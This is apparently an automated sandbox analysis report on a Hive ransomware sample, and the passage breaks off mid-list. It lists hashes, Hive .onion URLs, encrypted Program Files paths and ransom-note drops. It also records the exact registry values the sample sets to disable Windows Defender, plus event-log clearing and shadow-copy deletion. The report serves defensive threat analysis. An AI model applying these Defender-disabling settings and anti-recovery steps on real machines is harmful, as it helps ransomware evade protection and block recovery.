Analysis
-
max time kernel
144s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12/03/2025, 01:43
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe
-
Size
2.5MB
-
MD5
8fdfa1997b566f6e086c29e33935dcc5
-
SHA1
178fbe1c8fc1a6e3440215d668797699f94a4bef
-
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
-
SHA512
b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
-
SSDEEP
24576:n1aan2Cc2sLnOJaoyN8sAwq5JQx40Dgga3gG7LMzgoUEyQTaRSOPE7O7S88Vt4C3:n3Dqy3PyzMCteCl/G/1D1o
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\auw1_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 884 MpCmdRun.exe -
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1516 wevtutil.exe 2224 wevtutil.exe 2264 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 1000 powershell.exe 2656 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_Mtf5t9M1ZDE0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_M3Jw_TsG7IE0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CRANE.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_OKYCXx18Kd40.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZLIB.ACCDE.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_hd3m9pj2RtI0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_OFF.GIF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_4rBbZEIb2Ik0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Media Player\en-US\wmplayer.exe.mui 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_VQZ0ycuqsyQ0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\css\calendar.css 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\auw1_HOW_TO_DECRYPT.txt 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_VK6tO2na-nU0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_-WMRa2zCbxU0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_EG2zqHYJD6Y0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_wAgFt5CISrc0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_D4oPiCfeHW40.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00726_.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_fJoW69rg01g0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_CYHQ8UYMOTo0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\IpsMigrationPlugin.dll.mui 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_orKZnJU2ReY0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\PREVIEW.GIF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_76S2Uakhnus0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_iV8AIdxMSHs0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\auw1_HOW_TO_DECRYPT.txt 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\auw1_HOW_TO_DECRYPT.txt 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\InfoPath.en-us\SETUP.XML.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_X-uRPErPX-A0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_Y2GkXyreuYY0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_JvaEqck5Bso0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_QTxZ5b1pm8A0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_0MYVAQyOejQ0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_yYZl2Lx2b8w0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_5rDZskNJcfg0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXC.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_d9YqaF4fZlM0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_RxEa9gjoEZQ0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_Xx8P09oCe7o0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_y9xb_XXOdXM0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\init.js 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_Tyfm3HIYwHw0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_4kF3xPkmqA00.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL11.POC.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_drP-JQe-IRs0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_LmJUYOBFhSg0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_A_xt-yOUviQ0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Main.gif.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_jeVN90-TCWQ0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_oo2z-WJy1YA0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_39u6JYJ4gSU0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_LSWl-qAT31Y0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_xRSwqWTYGqo0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\auw1_HOW_TO_DECRYPT.txt 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Internet Explorer\en-US\F12Tools.dll.mui 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_YitE9m52Ne80.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01563_.WMF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_1h9hQKLT--80.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50B.GIF.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_Yg59PbSE47w0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Installed_resources14.xss.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_FdtlfiVNhd40.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\excel.exe.manifest.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_HTH1aO2mxr00.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_ulbkTZ0onB80.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_FJPzqp0gWGI0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_qD1-0L4TVJA0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf.t3sEXi5KpRPtXW1r6HxU-xgY_cE9sGvQGznMsx8f0U7_oHKuAp0JhBs0.fmu9d 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2216 sc.exe 2088 sc.exe 1152 sc.exe 2876 sc.exe 2308 sc.exe 3024 sc.exe 2892 sc.exe 3052 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-12_8fdfa1997b566f6e086c29e33935dcc5_frostygoop_hive_sliver_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened 